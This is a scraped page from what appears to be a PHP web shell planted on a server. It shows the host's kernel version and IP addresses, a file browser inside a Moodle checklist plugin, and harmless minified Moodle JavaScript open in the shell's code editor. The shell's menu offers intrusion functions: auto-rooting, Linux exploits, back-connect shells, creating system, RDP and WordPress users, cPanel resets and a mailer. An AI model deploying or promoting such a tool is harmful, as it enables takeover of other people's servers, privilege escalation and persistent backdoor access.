Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.71.195.86
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
mod /
checklist /
amd /
build /
[ HOME SHELL ]
Name
Size
Permission
Action
student_comment.min.js
1.4
KB
-rw-r--r--
student_comment.min.js.map
4.7
KB
-rw-r--r--
update_checklist.min.js
4.47
KB
-rw-r--r--
update_checklist.min.js.map
9.81
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : student_comment.min.js
/** * Push student comments to checklist plugin via ajax. * * @module mod_checklist/student_comments * @copyright 2021 Kristian Ringer <kristian.ringer@gmail.com> * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ define("mod_checklist/student_comment",["jquery","core/ajax","core/notification","core/str"],(function($,Ajax,Notification,String){return{init:function(cmid){let comments=$(".studentcommentinput"),currentComments=[];for(let i=0;i<comments.length;i+=1){let comment=comments[i];currentComments[i]=comment.value,comment.addEventListener("change",(function(e){const newComment=e.target.value.trim();if(currentComments[i]!==newComment){let classString=e.target.classList[0],checklistitemid=classString.substr(classString.lastIndexOf("studentcommentid")+"studentcommentid".length),spinner="#checklistspinnerstudentcomment"+checklistitemid;$(spinner).css("display","inline-block");let request={methodname:"mod_checklist_update_student_comment",args:{comment:{commenttext:newComment,checklistitemid:checklistitemid,cmid:cmid}}};Ajax.call([request])[0].done((function(data){$(spinner).css("display","none"),!0===data?(currentComments[i]=newComment,comment.defaultValue=newComment):Notification.addNotification({message:String.get_string("update_student_comment_failed","mod_checklist"),type:"error"})})).fail(Notification.exception)}}))}}}})); //# sourceMappingURL=student_comment.min.js.map
Close